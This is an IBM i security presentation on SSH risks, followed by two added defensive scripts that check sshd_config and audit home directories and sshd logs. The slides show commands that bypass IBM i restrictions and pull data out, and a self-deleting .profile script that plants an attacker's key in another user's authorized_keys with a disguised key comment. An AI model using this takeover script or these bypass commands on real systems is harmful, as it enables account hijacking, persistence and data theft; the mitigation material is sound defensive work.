User Home Directory. Hackingiseries.com



Insecure Shells: The problem with SSH

Shalom Carmel is the CTO of GlobalDots.com, a security expert and the author of the Hacking iSeries book. He can be contacted at shalom@hackingiseries.com.

You are going to see how SSH deployment on IBM i may cause unexpected, major security risks.

SSH functionality
  sftp, scp: secure file transfer
  ssh: secure shell (like Telnet)
  Available on IBM i since 5.3

SSH is good
  SSH is encrypted; FTP and TELNET are not
  Easy to script file transfers
  SSH can be used to encrypt other cleartext protocols via tunneling
  De-facto standard in Unix/Linux

However, SSH deployment on IBM i may cause unexpected, major security risks.

IBM i security methodology
  Application security
  System configuration
  Limit user special authorities
  Limit user capabilities
  Exit program security
  System object security
  Too often not implemented well.

No application security
  Use the db2 utility to access or modify data:

    $ qsh -c 'db2 "select * from NWDB.products"' > products.txt
    $

Some system configuration is irrelevant
  Session timeout, limit QSECOFR access, limit virtual devices: these 5250 policies are irrelevant to SSH
  Password policies: irrelevant to SSH if using private keys

A user has limited capabilities in the user profile and cannot run some commands.

No limit to user capabilities in SSH
  Use the system utility to run the command that was previously blocked:

    Using username "shalom".
    shalom@myas400's password:
    $ system dltf NWDB/items
    CPC2191: Object ITEMS in NWDB type *FILE deleted.
    $

SSH disregards 5250 parms
  Ignores the user-level initial program
  Ignores the user-level initial menu

No exit program security
  Use external sftp tools to get the data out, either from the IFS or from a library:

    psftp> open MyAS400
    login as: shalom
    shalom@myas400's password:
    Remote working directory is /home/shalom
    psftp> get products.txt
    remote:/home/shalom/products.txt => local:products.txt
    psftp> get /qsys.lib/nwdb.lib/prices.file/prices.mbr
    remote:/qsys.lib/nwdb.lib/prices.file/prices.mbr => local:prices.mbr

...and while we're at it, let's gather some intelligence for the next phase.

User profiles

    psftp> cd /qsys.lib
    Remote directory is now /qsys.lib
    psftp> ls *.USRPRF
    Listing directory /qsys.lib
    ?rwx------ 1 qsecofr 0  217088 Mar 13  2011 KOKO.USRPRF
    ?rwx------ 1 qsecofr 0  548864 Mar 13  2011 MARYLIN.USRPRF
    ?rwx---r-x 1 vndprof 0  389120 Oct 17 14:23 MENNY.USRPRF
    ?rwx------ 1 qsys    0 8466432 Oct 17 16:08 QDBSHR.USRPRF
    ?rwx------ 1 qsys    0 2699264 Oct 17 14:56 QDBSHRDO.USRPRF
    ?rwx------ 1 qsys    0  110592 Mar 13  2011 QTMPLPD.USRPRF
    ?rwx------ 1 qsecofr 0 1150976 Mar 13  2011 RON.USRPRF
    ?rwx------ 1 qsecofr 0  221184 Mar 13  2011 ROSY.USRPRF
    ?rwx------ 1 qsecofr 0  241664 Oct 17 15:45 SHALOM.USRPRF
    ?rwx------ 1 qsecofr 0  258048 Mar 13  2011 TAMMI.USRPRF
    ?rwx------ 1 qsecofr 0 2719744 Mar 13  2011 TOBIAS.USRPRF
    psftp>

List of libraries: possible targets to explore

    psftp> cd /qsys.lib
    Remote directory is now /qsys.lib
    psftp> ls *.LIB
    Listing directory /qsys.lib
    ...
    drwx------ 1 qdftown 0   2719744 Mar 13  2011 AAETEST2.LIB
    drwx---rwx 1 qdftown 0   7110592 Mar 13  2011 ABCDATAD.LIB
    drwx---rwx 1 vndprof 0 675217088 Mar 13  2011 ABCDATAP.LIB
    drwx---rwx 1 vndprof 0  92699264 Dec 17 14:56 ABCDATAQA.LIB
    drwx---rwx 1 vndprof 0   3466432 Dec 17 16:08 ABCPGMD.LIB
    drwx---rwx 1 vndprof 0   4548864 Mar 13  2011 ABCPGMP.LIB
    drwx---rwx 1 vndprof 0   4389120 Dec 17 14:23 ABCPGMQA.LIB
    drwx------ 1 quser   0    258048 Mar 13  2011 ADTSLAB.LIB
    drwx---rwx 1 benny   0    221184 Mar 13  2011 APBENNY.LIB
    drwx------ 1 quser   0    241664 Oct 17 15:45 APSHPY.LIB
    drwx------ 1 qdftown 0   1150976 Mar 13  2011 AU117FR.LIB
    ...
    psftp>

So far we have seen that SSH
  Ignores key system values
  Disregards user limited capabilities
  Bypasses application security
  Is not controlled by exit program security

IBM i security with SSH
  System configuration
  Limit user special authorities
  Limit user capabilities
  Application security
  Exit program security
  System object security

You are still at risk, because...

You are going to see how to take over another user's account via SSH.

First, some explanations about shells and keys.

"A shell is a piece of software that provides an interface for users of an operating system which provides access to the services of a kernel." (Wikipedia)

On IBM i this is a shell: the regular AS/400 5250 menu system and command line

    USER                        User Tasks                 System:   MYAS400
    Select one of the following:
         1. Display or change your job
         2. Display messages
         3. Send a message
         4. Submit a job
         5. Work with your spooled output files
         6. Work with your batch jobs
         7. Display or change your library list
         8. Change your password
         9. Change your user profile
        60. More user task options
        90. Sign off
    Selection or command
    ===>
    F3=Exit   F4=Prompt   F9=Retrieve   F12=Cancel
    F13=Information Assistant   F16=System Main menu
    (C) COPYRIGHT IBM CORP. 1980, 2007.

But so is this: the QSH command

                              QSH Command Entry
      Hello SHALOM
      $
    ===>
    F3=Exit   F6=Print   F9=Retrieve   F12=Disconnect   F13=Clear
    F17=Top   F18=Bottom   F21=CL command entry

And this: PASE AIX emulation (CALL QP2TERM)

                              /QOpenSys/usr/bin/-sh
      Hello SHALOM
      #
    ===>
    F3=Exit   F6=Print   F9=Retrieve   F11=Truncate/Wrap   F13=Clear
    F17=Top   F18=Bottom   F21=CL command entry

And also SSH: SSH runs in the PASE environment and behaves like PASE, except for different keyboard control.

Shell mix-up
  The AS/400 command line is the primary shell
  We're good at limiting it, managing access and setting up defaults
  Very little thought is given to the proper setup of the other shells

SSH private key authentication
  Enabled by default in the sshd configuration
  The user creates a private/public key pair
  The public key is placed on the server
  The private key can be protected by a passphrase, creating strong, two-factor authentication
  Enterprise SSH key management is difficult

Let's get down to business.

Take over another user via SSH
  Possible due to the shell mix-up on IBM i
  I am going to associate my own public key with another user
  The method shown is one of several possible; use your imagination to find other methods
  After the takeover, I can log in via SSH as the other user and do stuff as that user
  Changing the password does not help at all

Step 1: Find a user
  Must have access to the user's home directory (simple, because that is the system default)
  Either a user with *ALLOBJ authority, or a user who owns their home directory
  A user who uses Qshell or PASE (but there are workarounds)

*ALLOBJ considerations
  If the perpetrator has *ALLOBJ authority, there are still good reasons for him to want to masquerade as someone else
  A perpetrator with *ALLOBJ can set up another user without the elaborate preparations detailed in this presentation

Using ssh to find a user
  In a previous slide you saw how to list QSYS; let's look for a user who has a home dir:

    Using username "badguy".
    Authenticating with public key "openssh-key"
    $ cd /home
    $ ls -l
    total 136
    drwxrws---  2 badguy    0  8192 Jan 11 09:25 BADGUY
    drwxrwsrwx  2 goodguy   0  8192 Jan 12 01:45 GOODGUY
    drwxrwsrwx  3 qibmhelp  0  8192 Apr 28  2008 QIBMHELP
    drwxrwsrwx  3 qsecofr   0  8192 Jan 11 10:39 QPGMR
    drwxrwsrwx  2 qsecofr   0 12288 Jan 12 01:57 QSECOFR
    drwx--s---  2 user0011  0  8192 Jan  9 09:39 USER0011
    drwx--s---  3 user0022  0  8192 Jan  9 09:31 USER0022
    $

Step 2: Create the homedir
  The attacked user must already own an existing home directory or have *ALLOBJ authority
  If the attacked user has *ALLOBJ authority but no home directory, the following command creates the home directory for the next steps:

    MKDIR DIR('/home/GOODGUY') DTAAUT(*EXCLUDE) OBJAUT(*NONE)

Step 3: Modify the shell startup
  In the home directory, create a file called .profile (with a dot) that does the following:
  Creates a directory called .ssh
  Places my public key in the file .ssh/authorized_keys
  Removes all public authority from the home directory, the .ssh directory and authorized_keys
  Sets ownership of the home directory to self

Step 3: Sample .profile script
  In the echo command below, the key string (shown in red on the original slide) should be replaced with your public key. The "QIBM 5799SS4 SSHD V3.51" string is just for show.

    # create the .ssh directory if it is missing
    if [ ! -d .ssh ]
    then
      mkdir .ssh
    fi
    chmod 700 .ssh
    # create the key file if it is missing; setccsid gives it an ASCII CCSID
    if [ ! -f .ssh/authorized_keys ]
    then
      touch .ssh/authorized_keys
      setccsid 1252 .ssh/authorized_keys
    fi
    # append the public key
    echo ssh-rsa AAAAB3Nza...7/rNy8= QIBM 5799SS4 SSHD V3.51 \
      >> .ssh/authorized_keys
    # remove public authority from the key file and the home directory
    chmod 700 .ssh/authorized_keys
    chmod 700 .
    # the script deletes itself after the first run
    rm .profile

Step 4: Wait
  As previously stated, this only works with users who run interactive, non-5250 shell sessions; typically these are the power IT users
  If you have *ALLOBJ authority, you can set up all the necessary files and permissions yourself
  Or find another creative way to force a user to run some code. Read my book for ideas!

Private key authentication highlights
  Does not care about expired passwords
  Can log in even if the password is *NONE
  Respects the *DISABLED user status
  Uses special authorities and object permissions
  The authorized_keys file can contain multiple public keys

Mitigation: Prevention
  Manage a white list of allowed users and IP addresses in the sshd configuration file
  Improve the native object security
  Jail (chroot) your ssh users (good luck with it)
  Create a secure home directory for all relevant users
  Get a good security package with integrated ssh support
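The shell script below is an added example, not part of the presentation: it reads sshd_config text and reports whether the settings that counter the .profile takeover above are in place. It relies only on standard OpenSSH directives (AuthorizedKeysFile, AllowUsers/AllowGroups, StrictModes). The hardened key location /QOpenSys/etc/ssh/authorized_keys/%u is an assumption for the example (it must be a directory that ordinary users cannot write to), and both configuration texts are constructed. The point it shows: StrictModes yes (the default) does not stop the takeover, because the planted .profile sets exactly the 700 permissions sshd expects; moving AuthorizedKeysFile out of the user's home does.

```shell
#!/bin/sh
# Added example (not from the presentation): check sshd_config for the
# settings that block the .profile / authorized_keys takeover.
# Assumption: /QOpenSys/etc/ssh/authorized_keys/ is a directory owned by
# QSECOFR that ordinary users cannot write to.

# Weak configuration, constructed for the example. The commented-out
# AllowUsers line shows that comments are ignored by the parser.
WEAK_CONFIG='#AllowUsers goodguy
AuthorizedKeysFile .ssh/authorized_keys
PasswordAuthentication yes'

# Hardened configuration, constructed for the example.
HARDENED_CONFIG='AllowUsers goodguy shalom
AuthorizedKeysFile /QOpenSys/etc/ssh/authorized_keys/%u
PasswordAuthentication no
StrictModes yes'

# first_value CONFIG_TEXT KEYWORD: print the first value of KEYWORD.
# sshd uses the first occurrence of a keyword; later ones are ignored.
first_value() {
    printf '%s\n' "$1" | awk -v key="$2" '
        $1 !~ /^#/ && tolower($1) == tolower(key) { print $2; exit }'
}

# check_sshd_config CONFIG_TEXT: print one line per finding and return
# the number of findings (0 means all three checks pass).
check_sshd_config() {
    cfg=$1
    findings=0

    keys=$(first_value "$cfg" AuthorizedKeysFile)
    if [ -z "$keys" ]; then
        keys=".ssh/authorized_keys"   # OpenSSH default when unset
    fi
    # A relative path or one containing %h resolves inside the user's home,
    # where a .profile running as that user can plant keys.
    case $keys in
        *%h*|[!/]*)
            echo "FINDING: AuthorizedKeysFile '$keys' is inside the user's home directory"
            findings=$((findings + 1)) ;;
    esac

    if [ -z "$(first_value "$cfg" AllowUsers)" ] && [ -z "$(first_value "$cfg" AllowGroups)" ]; then
        echo "FINDING: no AllowUsers/AllowGroups; every profile with a key or password may log in"
        findings=$((findings + 1))
    fi

    strict=$(first_value "$cfg" StrictModes | tr 'A-Z' 'a-z')
    if [ "$strict" = "no" ]; then
        echo "FINDING: StrictModes no; sshd accepts key files anyone can write"
        findings=$((findings + 1))
    fi
    # StrictModes yes alone does not stop the takeover: the planted
    # .profile already sets the 700 permissions sshd checks for.
    return $findings
}

check_sshd_config "$WEAK_CONFIG" || echo "weak config: $? finding(s)"
check_sshd_config "$HARDENED_CONFIG" && echo "hardened config: no findings"
```

To check a real file, pass its contents: check_sshd_config "$(cat /path/to/sshd_config)". The sshd_config location on IBM i varies by release, so the path is left to the reader. first_value stops at the first match because sshd itself ignores later repetitions of a keyword, so a hardened line appended at the end of a file does nothing.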

Mitigation: Audit
  Have a syslog daemon running and log ssh authentication
  Audit the /QOpenSys/etc/profile and /etc/profile files
  Audit the authorized_keys files
  Get a good security package with auditing and syslog support
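As an added example (not from the presentation), the script below carries out two of the audit items above over constructed data: it walks a /home-style tree to list every authorized_keys file and the key comments in it, flags key files belonging to users who are not on an expected list, flags shell startup files that touch authorized_keys (the planting step from Step 3), and scans constructed sshd syslog lines for public-key logins by users who are not expected to use keys. User names, keys, startup files and log lines are constructed; that startup files are .profile, .kshrc or .bashrc and that keys live in ~/.ssh/authorized_keys are assumptions of the example.

```shell
#!/bin/sh
# Added example (not from the presentation): two audit checks for the
# key-planting takeover. User names, keys, startup files and log lines
# below are constructed. Assumptions: home directories sit under one
# root (/home on IBM i), startup files are .profile, .kshrc or .bashrc,
# and sshd reads keys from ~/.ssh/authorized_keys.

# audit_homes ROOT "USER1 USER2 ...": walk every home directory under ROOT.
# Lists each authorized key, flags key files of users who are not expected
# to use key authentication, and flags startup files that touch
# authorized_keys. Prints one line per item; returns the number of findings.
audit_homes() {
    base=$1
    expected=" $2 "
    findings=0
    for home in "$base"/*/; do
        home=${home%/}
        user=${home##*/}
        keys="$home/.ssh/authorized_keys"
        if [ -f "$keys" ]; then
            # Each key line is a standing credential that survives a
            # password change: print its type and comment for review.
            awk -v f="$keys" '/^(ssh-|ecdsa-)/ {
                c = ""; for (i = 3; i <= NF; i++) c = c " " $i
                print "key in " f ": " $1 c }' "$keys"
            case $expected in
                *" $user "*) ;;
                *) echo "FINDING: $user has $keys but is not expected to use keys"
                   findings=$((findings + 1)) ;;
            esac
        fi
        # A startup file runs with the user's own authority at every
        # Qshell, PASE or SSH login; one that edits the key file is the
        # persistence step shown in the slides.
        for rc in "$home/.profile" "$home/.kshrc" "$home/.bashrc"; do
            if [ -f "$rc" ] && grep -q 'authorized_keys' "$rc"; then
                echo "FINDING: $rc modifies authorized_keys"
                findings=$((findings + 1))
            fi
        done
    done
    return $findings
}

# flag_key_logins "LOG TEXT" "USER1 USER2 ...": report public-key logins
# (sshd syslog lines) by users not expected to use keys.
# Returns the number of logins flagged.
flag_key_logins() {
    printf '%s\n' "$1" | awk -v expected=" $2 " '
        /sshd\[[0-9]+\]: Accepted publickey for / {
            for (i = 1; i <= NF; i++) if ($i == "for") { user = $(i + 1); break }
            if (index(expected, " " user " ") == 0) {
                print "FINDING: unexpected public-key login: " $0
                n++
            }
        }
        END { exit n }'
}

# build_sample_tree: create a constructed /home-style tree in a temporary
# directory and print its path. GOODGUY carries a planted .profile that
# has not run yet; USER0011 has a key nobody approved.
build_sample_tree() {
    base=$(mktemp -d)
    mkdir -p "$base/BADGUY/.ssh" "$base/GOODGUY" "$base/USER0011/.ssh" "$base/QSECOFR"
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAAexample badguy@laptop\n' > "$base/BADGUY/.ssh/authorized_keys"
    printf 'mkdir .ssh\necho ssh-rsa AAAAB3NzaC1yc2EAAAAexample >> .ssh/authorized_keys\nrm .profile\n' > "$base/GOODGUY/.profile"
    printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5example user0011@pc\n' > "$base/USER0011/.ssh/authorized_keys"
    printf 'export PATH=/QOpenSys/usr/bin:$PATH\n' > "$base/QSECOFR/.profile"
    echo "$base"
}

# Constructed sshd syslog lines: a key login by goodguy is the sign that
# the takeover in the slides has succeeded.
SAMPLE_LOG='Jan 12 01:45:10 MYAS400 sshd[1234]: Accepted publickey for badguy from 10.1.2.3 port 51234 ssh2
Jan 12 01:46:02 MYAS400 sshd[1240]: Accepted password for user0011 from 10.1.2.9 port 51240 ssh2
Jan 12 01:57:31 MYAS400 sshd[1251]: Accepted publickey for goodguy from 10.1.2.3 port 51277 ssh2'

root=$(build_sample_tree)
audit_homes "$root" "BADGUY" || echo "home audit: $? finding(s)"
flag_key_logins "$SAMPLE_LOG" "badguy" || echo "log audit: $? finding(s)"
rm -rf "$root"
```

On a real system run audit_homes /home "list of approved key users" from PASE and feed the sshd lines of the syslog file to flag_key_logins; the expected-user list is the same white list the sshd configuration should enforce, so a finding from either function is a key the organization never approved.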

References
  Jailing your AS400 users: http://bit.ly/a2jg1r
  SSH in the Midrange wiki: http://bit.ly/kdhut